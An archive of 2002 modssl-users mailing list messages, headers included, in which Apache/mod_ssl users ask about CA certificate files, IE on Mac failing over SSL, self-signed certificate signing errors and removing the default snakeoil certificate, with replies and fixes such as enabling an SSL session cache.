X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Could someone e-mail me an example of Multiple CA's in SSLCACertificateFile (other than the ca-bundle.crt example). I tried just copying the -----BEGIN CERTIFICATE----- to -----END CERTIFICATE----- for each CA one right after the other, but it only recognizes the first one. I also cannot find the Makefile command in the directory that it suggests for the SSLCACertificatePath option. Can anyone who has successfully configured multiple ca's in one SSLCACertificateFile assist me? Thanks! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 29 09:23:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA13589; Fri, 29 Mar 2002 09:22:11 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from marvin-lnx.int.tele.dk id JAA13583; Fri, 29 Mar 2002 09:21:58 +0100 (MET) Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500) id 43E96BD2A; Fri, 29 Mar 2002 09:23:39 +0100 (CET) Date: Fri, 29 Mar 2002 09:23:39 +0100 From: Mads Toftum To: modssl-users@modssl.org Subject: [ejnorman@doit.wisc.edu: mod-ssl certificate request changes] Message-ID: <20020329082339.GC16448@marvin-lnx.int.tele.dk> Mail-Followup-To: modssl-users@modssl.org Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="ikeVEW9yuYc//A+q" Content-Disposition: inline X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users --ikeVEW9yuYc//A+q Content-Type: text/plain; charset=us-ascii Content-Disposition: inline --ikeVEW9yuYc//A+q Content-Type: message/rfc822 Content-Disposition: inline Return-Path: Delivered-To: mt@localhost.int.tele.dk Received: from localhost (localhost.localdomain [127.0.0.1]) by marvin-lnx.int.tele.dk (Postfix) with ESMTP id CDAA3BD2C for ; Thu, 28 Mar 2002 23:19:14 +0100 (CET) Received: from mailhotel2.inet.tele.dk [194.182.149.79] by localhost with POP3 (fetchmail-5.8.6) for mt@localhost (single-drop); Thu, 28 Mar 2002 23:19:14 +0100 (CET) Received: from mail-in2.inet.tele.dk ([194.182.148.151]) by mailhotel2.inet.tele.dk (Netscape Mail Server v2.02) with ESMTP id AAA33684 for ; Thu, 28 Mar 2002 23:17:24 +0100 Received: from mmx.engelschall.com (mmx.engelschall.com [195.27.130.252]) by mail-in2.inet.tele.dk (Postfix) with ESMTP id 2BA708108 for ; Thu, 28 Mar 2002 23:11:52 +0100 (CET) Received: by mmx.engelschall.com (Postfix) id A50171943B; Thu, 28 Mar 2002 23:11:11 +0100 (CET) Received: from opensource.ee.ethz.ch (opensource-01.ee.ethz.ch [129.132.7.153]) by mmx.engelschall.com (Postfix) with ESMTP id 6FD1419314 for ; Thu, 28 Mar 2002 23:11:11 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) for openssl-dev-L id XAA15262; Thu, 28 Mar 2002 23:10:19 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from imap1.doit.wisc.edu id XAA15149; Thu, 28 Mar 2002 23:09:46 +0100 (MET) Received: from [128.104.19.109] (HELO holstein.doit.wisc.edu) by imap1.doit.wisc.edu (CommuniGate Pro SMTP 3.5.6) with ESMTP id 14590792 for openssl-dev@openssl.org; Thu, 28 Mar 2002 16:09:44 -0600 Date: Thu, 28 Mar 2002 16:09:44 -0600 (CST) From: Eric Norman To: openssl-dev@openssl.org Subject: mod-ssl certificate request changes In-Reply-To: <20020328111728.GA21806@serv01.aet.tu-cottbus.de> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-openssl-dev@openssl.org Precedence: bulk Reply-To: openssl-dev@openssl.org X-Sender: Eric Norman X-List-Manager: OpenSSL Majordomo [version 1.94.4] X-List-Name: openssl-dev This is primary for Ralf and mod_ssl, but this is the list I'm on and they might be usable to other openssl folk. A while ago I wrote some code for mod_ssl-2.8.4-1.3.20 that implements the SSLCARequestFile directive. This allows explicit control of the CA distinguished names sent in a client certificate request. That is, there are cases where you want these names to differ from the CAs that you trust with the SSLCACertificateFile directive. It defaults to the latter (current behavior) if omitted. Careful use of this allows Netscape's "Select Automatically" option to work properly. The code is available at http://bossie.doit.wisc.edu/code/mod_ssl You're welcome to it and it would be nice to see it (or equivalent functionality) included in future mod_ssl releases. Eric Norman "Congress shall make no law restricting the size of integers that may be multiplied together, or the number of times that an integer may be multiplied by itself, or the modulus by which an integer may be reduced". ______________________________________________________________________ OpenSSL Project http://www.openssl.org Development Mailing List openssl-dev@openssl.org Automated List Manager majordomo@openssl.org --ikeVEW9yuYc//A+q-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 29 17:02:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA04846; Fri, 29 Mar 2002 17:01:18 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from viefep12-int.chello.at id RAA04829; Fri, 29 Mar 2002 17:00:57 +0100 (MET) Received: from localhost ([212.17.119.87]) by viefep12-int.chello.at (InterMail vM.5.01.03.06 201-253-122-118-106-20010523) with ESMTP id <20020329160051.NVVY8446.viefep12-int.chello.at@localhost> for ; Fri, 29 Mar 2002 17:00:51 +0100 Date: Fri, 29 Mar 2002 17:02:16 +0100 From: Robert Allerstorfer X-Mailer: Why so curious? ;-) Organization: ANET - New Media Solutions X-Priority: 3 (Normal) Message-ID: <2810974430.20020329170216@anet.at> To: John Siracusa Subject: Re[2]: No solution for bug with IE on Mac? In-Reply-To: References: MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Robert Allerstorfer X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi John, On Wed, 27 Mar 2002, 08:56 GMT-05 (14:56 local time) John Siracusa wrote: > Actually, I think there is (finally!) a solution. The following works for > me (thanks to Mark J. Lilback). I thought I posted it here earlier, but if > not, I'm sorry! :) > BrowserMatch "MSIE [1-4]" nokeepalive ssl-unclean-shutdown \ > downgrade-1.0 force-response-1.0 > BrowserMatch "MSIE [5-9]" ssl-unclean-shutdown > I'm also using this cipher suite line, but the default might work, too: > SSLCipherSuite > !EXP1024-RC4-SHA:!EXP1024-DES-CBC-SHA:ALL:!ADH:!EXP56:RC4+RSA:+HIGH:+MEDIUM: > +LOW:+SSLv2:+EXP:+eNULL thanks for this suggesion but, unfortunately, removing those additional environment variables for IE 5+ could not solve the problem. Also, the new SSLCipherSuite didn't make a difference. I now use the default value for the SSLCipherSuite directive. But, Mac users still cannot connect properly with their IE. I am now not sure if this will be ever possible - probably, Microsoft should state something about their problem. best, rob. -- Robert Allerstorfer ANET - New Media Solutions Allerstorfer & Beutel OEG A-1070 Wien, Apollogasse 9/7 Fon: (+43 1) 929133-1 Fax: (+43 1) 929133-2 http://www.anet.at info@anet.at PGP Public key: http://www.anet.at/info@anet.at_pub.asc ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 29 17:51:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA06667; Fri, 29 Mar 2002 17:50:14 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from viefep14-int.chello.at id RAA06646; Fri, 29 Mar 2002 17:49:50 +0100 (MET) Received: from localhost ([212.17.119.87]) by viefep14-int.chello.at (InterMail vM.5.01.03.06 201-253-122-118-106-20010523) with ESMTP id <20020329164944.REDA11252.viefep14-int.chello.at@localhost> for ; Fri, 29 Mar 2002 17:49:44 +0100 Date: Fri, 29 Mar 2002 17:51:10 +0100 From: Robert Allerstorfer X-Mailer: Why so curious? ;-) Organization: ANET - New Media Solutions X-Priority: 3 (Normal) Message-ID: <13113907968.20020329175110@anet.at> To: James Hastings-Trew Subject: Re[2]: No solution for bug with IE on Mac? In-Reply-To: References: MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Robert Allerstorfer X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi James, On Thu, 28 Mar 2002, 11:56 GMT-06 (18:56 local time) James Hastings-Trew wrote: > Basically, the only thing that fixed it on my server was to establish a > sessioncache. I've been using IE on a Mac with our secure pages for months > now. that sounds interesting. So can we be sutre that the problem has nothing to do with the nokeepalive environment variable that IE4 seems to need and also nothing with SSLCipherSuite? Could you please explain how to "establish a sessioncache"? Thanks, rob. -- Robert Allerstorfer ANET - New Media Solutions Allerstorfer & Beutel OEG A-1070 Wien, Apollogasse 9/7 Fon: (+43 1) 929133-1 Fax: (+43 1) 929133-2 http://www.anet.at info@anet.at PGP Public key: http://www.anet.at/info@anet.at_pub.asc ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 29 22:45:22 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA19263; Fri, 29 Mar 2002 22:44:43 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from [207.208.149.138] id WAA19151; Fri, 29 Mar 2002 22:43:20 +0100 (MET) Received: from natasha.swc.com by [207.208.149.138] via smtpd (for opensource-01.ee.ethz.ch [129.132.7.153]) with SMTP; 29 Mar 2002 21:43:20 UT Received: by natasha.swc.com with Internet Mail Service (5.5.2650.21) id ; Fri, 29 Mar 2002 15:31:23 -0600 Message-ID: From: Terry Ziemniak To: "'modssl-users@modssl.org'" Subject: SSL cache issue Date: Fri, 29 Mar 2002 15:31:22 -0600 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C1D769.12D2F1E0" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Terry Ziemniak X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_001_01C1D769.12D2F1E0 Content-Type: text/plain I am getting 'page not found errors' the first time I access certain JSP pages (though there are others that always work). If I refresh the page displays correctly. Notes: 1. This only happens over HTTPS, never over HTTP 2. Netscape (v 4.2) displayed the error "Data Missing. This document resulted from a POST operation and has expired from the cache. If you wish you can repost the form data to create the document by pressing the reload button." 3. Apache's access.log seems to validate point 2. The last line before an error is a POST. The retry shows a POST followed shortly by anther GET and POST of the same JSP. 4. I have not yet been able to exactly describe 'First time'. General rule of them, if I repeat the process within 15 minutes it seems OK. If I wait an hour it should fail. Though quantifying that has not been my highest priority. 5. I am running Apache_1.3.20-Mod_SSL_2.8.4-OpenSSL_0.9.6a-WIN32 and Resin 1.2.8. Any help would be appreciated. Terry Ziemniak ------_=_NextPart_001_01C1D769.12D2F1E0 Content-Type: text/html Content-Transfer-Encoding: quoted-printable

I am getting 'page not found errors' the first time I access certain JSP pages (though there are others that always = work).  If I refresh the page displays correctly.  =

 

Notes:

  1. This only happens over HTTPS, never over = HTTP
  2. Netscape (v 4.2) displayed the error "Data Missing.  This document resulted = from a POST operation and has expired from the cache.  If you wish you can = repost the form data to create the document by pressing the reload = button."
  3. Apache's access.log seems to validate point 2.  The last line before an error is a POST.  The retry shows a POST = followed shortly by anther GET and POST of the same = JSP.
  4. I have not yet been able to exactly describe 'First time'.  General rule of them, if = I repeat the process within 15 minutes it seems OK.  If I wait an hour it = should fail.  Though = quantifying that has not been my highest priority.
  5. I am running Apache_1.3.20-Mod_SSL_2.8.4-OpenSSL_0.9.6a-WIN32 and Resin = 1.2.8.

 

Any help would be = appreciated.

 

Terry Ziemniak

 

------_=_NextPart_001_01C1D769.12D2F1E0-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Mar 31 09:24:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA07930; Sun, 31 Mar 2002 09:23:09 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from dark-lord.ihtruelsen.2y.net id JAA07908; Sun, 31 Mar 2002 09:22:03 +0200 (MET DST) Received: (qmail 22296 invoked by uid 1000); 31 Mar 2002 07:22:02 -0000 Message-ID: <20020331072202.22295.qmail@dark-lord.ihtruelsen.2y.net> From: "Ian Truelsen" To: "Mod_SSL User List" Subject: Error with self signed certificate Date: Sun, 31 Mar 2002 01:22:02 -0600 Mime-Version: 1.0 Content-Type: text/plain; format=flowed; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Ian Truelsen" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I am trying to set up a self-signed certificate for my Apache server. Following the instructions in the docs, I was able to create the server.key, server.crt and ca.key without any errors. However, when I try to use the sign.sh script to sign the script, I get the following: ian@dark-lord ian $ ./sign.sh server.csr CA signing: server.csr -> server.crt: Using configuration from ca.config Enter PEM pass phrase: Check that the request matches the signature Signature ok The Subjects Distinguished Name is as follows countryName :PRINTABLE:'CA' stateOrProvinceName :PRINTABLE:'Manitoba' localityName :PRINTABLE:'Winnipeg' organizationName :PRINTABLE:'Hellacious Places' commonName :PRINTABLE:'www.ihtruelsen.2y.net' emailAddress :IA5STRING:'webmaster@ihtruelsen.2y.net' Certificate is to be certified until Mar 31 07:02:41 2003 GMT (365 days) Sign the certificate? [y/n]:y 1 out of 1 certificate requests certified, commit? [y/n]y Write out database with 1 new entries Data Base Updated CA verifying: server.crt <-> CA cert server.crt: /C=CA/ST=Manitoba/L=Winnipeg/O=Hellacious Places/CN=www.ihtruelsen.2y.net/Email=webmaster@ihtruelsen.2y.net error 18 at 0 depth lookup:self signed certificate /C=CA/ST=Manitoba/L=Winnipeg/O=Hellacious Places/CN=www.ihtruelsen.2y.net/Email=webmaster@ihtruelsen.2y.net error 7 at 0 depth lookup:certificate signature failure Now, there is a server.csr created, but I am concerned about the errors. Has something gone wrong, or is the server.csr fine to go? Thanks in advance. Ian Truelsen Masters program in Philosophy University of Manitoba, Winnipeg, Canada BA (Wilfrid Laurier University) Email: ian@ihtruelsen.2y.net ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Mar 31 09:58:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA08805; Sun, 31 Mar 2002 09:57:12 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from dark-lord.ihtruelsen.2y.net id JAA08793; Sun, 31 Mar 2002 09:56:42 +0200 (MET DST) Received: (qmail 23244 invoked by uid 1000); 31 Mar 2002 07:56:41 -0000 Message-ID: <20020331075641.23243.qmail@dark-lord.ihtruelsen.2y.net> From: "Ian Truelsen" To: "Mod_SSL User List" Subject: Removing snakeoil certificate Date: Sun, 31 Mar 2002 01:56:41 -0600 Mime-Version: 1.0 Content-Type: text/plain; format=flowed; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Ian Truelsen" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users How does one remove the default www.snakeoil.dom certificate from the system? I have renamed all the snakeoil keys in the ssl.crt, ssl.key and ssl.prm folders in my /etc/httpd folder. However any time that I try to access any https sites on my server, I still get the snakeoil certificate. What have I missed? Ian Truelsen Masters program in Philosophy University of Manitoba, Winnipeg, Canada BA (Wilfrid Laurier University) Email: ian@ihtruelsen.2y.net ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Mar 31 10:06:02 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA09462; Sun, 31 Mar 2002 10:05:05 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from marvin-lnx.int.tele.dk id KAA09433; Sun, 31 Mar 2002 10:04:09 +0200 (MET DST) Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500) id D1177BD2A; Sun, 31 Mar 2002 10:05:52 +0200 (CEST) Date: Sun, 31 Mar 2002 10:05:52 +0200 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: Removing snakeoil certificate Message-ID: <20020331080552.GA19896@marvin-lnx.int.tele.dk> Mail-Followup-To: modssl-users@modssl.org References: <20020331075641.23243.qmail@dark-lord.ihtruelsen.2y.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020331075641.23243.qmail@dark-lord.ihtruelsen.2y.net> X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Sun, Mar 31, 2002 at 01:56:41AM -0600, Ian Truelsen wrote: > How does one remove the default www.snakeoil.dom certificate from the > system? I have renamed all the snakeoil keys in the ssl.crt, ssl.key and > ssl.prm folders in my /etc/httpd folder. However any time that I try to > access any https sites on my server, I still get the snakeoil certificate. > What have I missed? > Restarting the server? vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Mar 31 10:24:03 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA09913; Sun, 31 Mar 2002 10:23:08 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from dark-lord.ihtruelsen.2y.net id KAA09907; Sun, 31 Mar 2002 10:22:50 +0200 (MET DST) Received: (qmail 30394 invoked by uid 1000); 31 Mar 2002 08:22:49 -0000 Message-ID: <20020331082249.30393.qmail@dark-lord.ihtruelsen.2y.net> References: <20020331075641.23243.qmail@dark-lord.ihtruelsen.2y.net> <20020331080552.GA19896@marvin-lnx.int.tele.dk> In-Reply-To: <20020331080552.GA19896@marvin-lnx.int.tele.dk> From: "Ian Truelsen" To: modssl-users@modssl.org Subject: Re: Removing snakeoil certificate Date: Sun, 31 Mar 2002 02:22:49 -0600 Mime-Version: 1.0 Content-Type: text/plain; format=flowed; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Ian Truelsen" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Mads Toftum writes: > On Sun, Mar 31, 2002 at 01:56:41AM -0600, Ian Truelsen wrote: >> How does one remove the default www.snakeoil.dom certificate from the >> system? I have renamed all the snakeoil keys in the ssl.crt, ssl.key and >> ssl.prm folders in my /etc/httpd folder. However any time that I try to >> access any https sites on my server, I still get the snakeoil certificate. >> What have I missed? >> > Restarting the server? > Did that, yet the certificate remains. Ian Truelsen Masters program in Philosophy University of Manitoba, Winnipeg, Canada BA (Wilfrid Laurier University) Email: ian@ihtruelsen.2y.net ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Mar 31 14:12:02 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA18558; Sun, 31 Mar 2002 14:11:07 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from viefep16-int.chello.at id OAA18539; Sun, 31 Mar 2002 14:10:40 +0200 (MET DST) Received: from localhost ([212.17.119.87]) by viefep16-int.chello.at (InterMail vM.5.01.03.06 201-253-122-118-106-20010523) with ESMTP id <20020331121034.YXV8689.viefep16-int.chello.at@localhost> for ; Sun, 31 Mar 2002 14:10:34 +0200 Date: Sun, 31 Mar 2002 14:11:58 +0200 From: Robert Allerstorfer X-Mailer: Why so curious? ;-) Organization: ANET - New Media Solutions X-Priority: 3 (Normal) Message-ID: <1284223292.20020331141158@anet.at> To: Robert Allerstorfer Subject: Re[3]: Solution for bug with IE on Mac! In-Reply-To: <13113907968.20020329175110@anet.at> References: <13113907968.20020329175110@anet.at> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Robert Allerstorfer X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Finally, I have now been able to find the solution required to make mod_ssl work with IE5 on the Mac. As suggested by James Hastings-Trew, establishing a global sessioncache did it. In detail, one should add a line like the following near the top of the section: SSLSessionCache dbm:/var/log/apache/ssl_session_cache The default timeout of 300 s works well. In addition, the following directive recommended in the mod_ssl FAQ to support old 56bit export versions of MSIE 5.x would also be a good idea, but is not required for the current IE5 on the Mac: SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP Unlike recommended in the mod_ssl FAQ, these environment variables are *not* needed by any IE5 tested so far: nokeepalive, downgrade-1.0 and force-response-1.0 so it should be better to only set them in versions smaller than 5: SetEnvIf User-Agent "MSIE [1-4]\." nokeepalive ssl-unclean-shutdown downgrade-1.0 force-response-1.0 SetEnvIf User-Agent "MSIE [5-9]\." ssl-unclean-shutdown I'm hapy to have found this easter egg :-) -- Robert Allerstorfer ANET - New Media Solutions Allerstorfer & Beutel OEG A-1070 Wien, Apollogasse 9/7 Fon: (+43 1) 929133-1 Fax: (+43 1) 929133-2 http://www.anet.at info@anet.at PGP Public key: http://www.anet.at/info@anet.at_pub.asc ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Mar 31 14:23:03 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA18876; Sun, 31 Mar 2002 14:22:08 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from gayguide.at id OAA18857; Sun, 31 Mar 2002 14:21:46 +0200 (MET DST) Received: from team (team.gayguide.at [192.168.1.11]) by gayguide.at (8.9.3/8.9.3) with SMTP id PAA12692 for ; Sun, 31 Mar 2002 15:14:07 +0200 From: =?iso-8859-1?Q?Peter_St=F6hr?= To: Subject: AW: [BugDB] PRIVATE: Build and install the SSL-aware Apache (PR#670) Date: Sun, 31 Mar 2002 14:20:19 +0200 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <200203092028.VAA04489@opensource.ee.ethz.ch> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: =?iso-8859-1?Q?Peter_St=F6hr?= X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi folks! I don't have this problem any more. I've taken the Apache 1.3.23 with mod_ssl 2.8.5. Happy eastern, Peter Stoehr Pink Advertsing - Vienna www.gaynet.at -----Ursprüngliche Nachricht----- Von: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]Im Auftrag von modssl-bugdb@modssl.org Gesendet: Samstag, 09. März 2002 21:28 An: modssl-users@modssl.org Cc: modssl-bugdb@modssl.org Betreff: [BugDB] PRIVATE: Build and install the SSL-aware Apache (PR#670) Full_Name: Peter Stoehr Version: mod_ssl-2.8.5-1.3.22 OS: SuSE Linux 7.1 (Kernel 2.2.18) Submission from: (NULL) (212.17.86.61) Hello mod_ssl-Team! I used the Step-by-Step installation illustration on your modssl.org site. I've build OpenSSL well. After this, i tried the next step (nr.3): I started in the mod_ssl directory like next: $ ./configure \ --with-apache=../apache_1.3.22 \ --with-ssl=../openssl-0.9.6c \ --prefix=/usr/local/httpd Then it started and the massages were: Configuring mod_ssl/2.8.5 for Apache/1.3.22 + Apache location: ../apache_1.3.22 (Version 1.3.22) + OpenSSL location: ../openssl-0.9.6c + Auxiliary patch tool: ./etc/patch/patch (local) + Applying packages to Apache source tree: o Extended API (EAPI) o Distribution Documents o SSL Module Source o SSL Support o SSL Configuration Additions o SSL Module Documentation o Addons Done: source extension and patches successfully applied. Configuring for Apache, Version 1.3.22 + using installation path layout: Apache (config.layout) configure:Error: No such module named 'ssl' ./configure:Error: APACI failed I really don't know, what the program wants. I also checked the FAQ and on the usenet, but I can't find any answer. Perhaps you could help me. Regarding the question, why I don't use Apache 1.3.23 is, that the new webserver of our organisation runs on 1.3.22, so I'll tried to make a second server only for testing. Perhaps you also know a apache-site in german or a german forum for talking about apache and modules. Kind regards from Vienna Peter Stoehr Pink Advertising www.gaynet.at ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 1 17:46:20 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA29696; Mon, 1 Apr 2002 17:45:19 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id RAA29670; Mon, 1 Apr 2002 17:44:46 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id 1F4BC4CE74F; Mon, 1 Apr 2002 17:44:46 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g31FarD35966; Mon, 1 Apr 2002 17:36:53 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mailout10.sul.t-online.com id QAA27431; Mon, 1 Apr 2002 16:49:55 +0200 (MET DST) Received: from fwd05.sul.t-online.de by mailout10.sul.t-online.com with smtp id 16s385-0006Go-04; Mon, 01 Apr 2002 16:49:53 +0200 Received: from chaos7 (320095466911-0001@[62.225.211.102]) by fwd05.sul.t-online.com with smtp id 16s37u-0xPfA9C; Mon, 1 Apr 2002 16:49:42 +0200 Message-ID: <00c801c1d98c$e0129e90$7500a8c0@chaos7> From: Markus.Plesch@t-online.de (Markus) To: Subject: Problem with IE under WIN NT if I call a DNS aliases of a website with HTTPS Date: Mon, 1 Apr 2002 16:52:40 +0200 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_00C4_01C1D99D.A2C273B0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300 X-Sender: 320095466911-0001@t-dialin.net Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Markus.Plesch@t-online.de (Markus) X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. ------=_NextPart_000_00C4_01C1D99D.A2C273B0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hello, I hope someone somewhere in the internet can help me.=20 I have a website like xxx.yyy.com which should only reachable with = https. The common name of the Verisign Global ID certificate is xxx.yyy.com.=20 Calling this website with https isn't a problem on all platforms. But if = I call this website with https and an alternative DNS alias like xxx.zzz.com or xxx.yyy.de I get with Internet Explorer 5.0 and 5.5 only on Windows NT=20 - on Windows 2000 it works - the error message " Cannot find server or DNS Error Internet Explorer=20 ". I don't know if this problem exists under Windows 95, 98, ME or Windows = XP. With Netscape Navigator this problem doesn't occur.=20 I use an Apache Server 1.3.22 with Modssl on Windows 2000 Server. Thank you for all suggestions, hints and so on. Friendly regards, Markus=20 markus.plesch@t-online.de ------=_NextPart_000_00C4_01C1D99D.A2C273B0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Hello,
 
I hope someone somewhere in the = internet can help=20 me.
 
I have a website = like xxx.yyy.com which=20 should only reachable with https.
The common name of the Verisign Global ID certificate=20 is xxx.yyy.com.
Calling this website with = https isn't a=20 problem on all platforms. But if I call
this website with https and an alternative DNS alias like xxx.zzz.com=20 or
xxx.yyy.de I get with Internet Explorer 5.0 = and 5.5=20 only on Windows NT
- on Windows 2000 it works - the error message "

Cannot = find server or=20 DNS Error
Internet Explorer

".
 
I don't know if this problem exists under Windows 95, 98, ME or Windows XP.
With Netscape Navigator this = problem doesn't occur.
 
I use an Apache Server 1.3.22 with = Modssl on=20 Windows 2000 Server.
 
Thank you for all suggestions, hints = and so=20 on.
 
Friendly regards,
Markus
markus.plesch@t-online.de
